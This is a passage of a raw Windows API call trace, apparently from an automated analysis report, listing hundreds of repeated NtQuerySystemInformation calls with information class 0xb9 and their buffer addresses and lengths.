ResultLength=0x0) [0222.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fee20, Length=0x28, ResultLength=0x0) [0222.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69feef0, Length=0x38, ResultLength=0x0) [0222.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69feef0, Length=0x38, ResultLength=0x0) [0222.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec90, Length=0x20, ResultLength=0x0) [0222.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec10, Length=0x20, ResultLength=0x0) [0222.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec10, Length=0x20, ResultLength=0x0) [0222.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec10, Length=0x20, ResultLength=0x0) [0222.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fee60, Length=0x20, ResultLength=0x0) [0222.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69feef0, Length=0x38, ResultLength=0x0) [0222.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fed80, Length=0x20, ResultLength=0x0) [0222.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fed00, Length=0x20, ResultLength=0x0) [0222.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fed00, Length=0x20, ResultLength=0x0) [0222.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fed00, Length=0x20, ResultLength=0x0) [0222.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69feef0, Length=0x38, ResultLength=0x0) [0222.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fed80, Length=0x20, ResultLength=0x0) [0222.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fed00, Length=0x20, ResultLength=0x0) [0222.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fed00, Length=0x20, ResultLength=0x0) [0222.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fed00, Length=0x20, ResultLength=0x0) [0222.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69feef0, Length=0x38, ResultLength=0x0) [0222.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fed80, Length=0x20, ResultLength=0x0) [0222.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fed10, Length=0x20, ResultLength=0x0) [0222.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fed10, Length=0x20, ResultLength=0x0) [0222.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69ff018, Length=0x58, ResultLength=0x0) [0222.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69feee0, Length=0x58, ResultLength=0x0) [0222.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fee00, Length=0x38, ResultLength=0x0) [0222.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec30, Length=0x28, ResultLength=0x0) [0222.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec30, Length=0x28, ResultLength=0x0) [0222.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec30, Length=0x28, ResultLength=0x0) [0222.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec30, Length=0x28, ResultLength=0x0) [0222.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69feca0, Length=0x28, ResultLength=0x0) [0222.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fee00, Length=0x38, ResultLength=0x0) [0222.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fed20, Length=0x28, ResultLength=0x0) [0222.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fed20, Length=0x28, ResultLength=0x0) [0222.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fee00, Length=0x38, ResultLength=0x0) [0222.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec80, Length=0x20, ResultLength=0x0) [0222.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec00, Length=0x20, ResultLength=0x0) [0222.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec00, Length=0x20, ResultLength=0x0) [0222.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec00, Length=0x20, ResultLength=0x0) [0222.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fee00, Length=0x38, ResultLength=0x0) [0222.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec80, Length=0x20, ResultLength=0x0) [0222.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec10, Length=0x20, ResultLength=0x0) [0222.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec10, Length=0x20, ResultLength=0x0) [0222.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69feee0, Length=0x58, ResultLength=0x0) [0222.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fee00, Length=0x38, ResultLength=0x0) [0222.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec30, Length=0x28, ResultLength=0x0) [0222.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec30, Length=0x28, ResultLength=0x0) [0222.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec30, Length=0x28, ResultLength=0x0) [0222.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec30, Length=0x28, ResultLength=0x0) [0222.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69feca0, Length=0x28, ResultLength=0x0) [0222.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fee00, Length=0x38, ResultLength=0x0) [0222.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fed20, Length=0x28, ResultLength=0x0) [0222.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fed20, Length=0x28, ResultLength=0x0) [0222.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69febc0, Length=0x20, ResultLength=0x0) [0222.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69feb40, Length=0x20, ResultLength=0x0) [0222.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69feb40, Length=0x20, ResultLength=0x0) [0222.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69feb40, Length=0x20, ResultLength=0x0) [0222.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fee00, Length=0x38, ResultLength=0x0) [0222.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fee00, Length=0x38, ResultLength=0x0) [0222.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec80, Length=0x20, ResultLength=0x0) [0222.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec10, Length=0x20, ResultLength=0x0) [0222.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec10, Length=0x20, ResultLength=0x0) [0222.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69feee0, Length=0x58, ResultLength=0x0) [0222.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fee00, Length=0x38, ResultLength=0x0) [0222.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec30, Length=0x28, ResultLength=0x0) [0222.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec30, Length=0x28, ResultLength=0x0) [0222.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec30, Length=0x28, ResultLength=0x0) [0222.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec30, Length=0x28, ResultLength=0x0) [0222.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69feca0, Length=0x28, ResultLength=0x0) [0222.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fee00, Length=0x38, ResultLength=0x0) [0222.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fed20, Length=0x28, ResultLength=0x0) [0222.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fed20, Length=0x28, ResultLength=0x0) [0222.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fee00, Length=0x38, ResultLength=0x0) [0222.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec80, Length=0x20, ResultLength=0x0) [0222.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec00, Length=0x20, ResultLength=0x0) [0222.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec00, Length=0x20, ResultLength=0x0) [0222.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec00, Length=0x20, ResultLength=0x0) [0222.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fee00, Length=0x38, ResultLength=0x0) [0222.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec80, Length=0x20, ResultLength=0x0) [0222.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec10, Length=0x20, ResultLength=0x0) [0222.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec10, Length=0x20, ResultLength=0x0) [0222.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69feee0, Length=0x58, ResultLength=0x0) [0222.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fedc0, Length=0x38, ResultLength=0x0) [0222.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec00, Length=0x28, ResultLength=0x0) [0222.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec00, Length=0x28, ResultLength=0x0) [0222.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec00, Length=0x28, ResultLength=0x0) [0222.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec00, Length=0x28, ResultLength=0x0) [0222.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec70, Length=0x28, ResultLength=0x0) [0222.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.435] 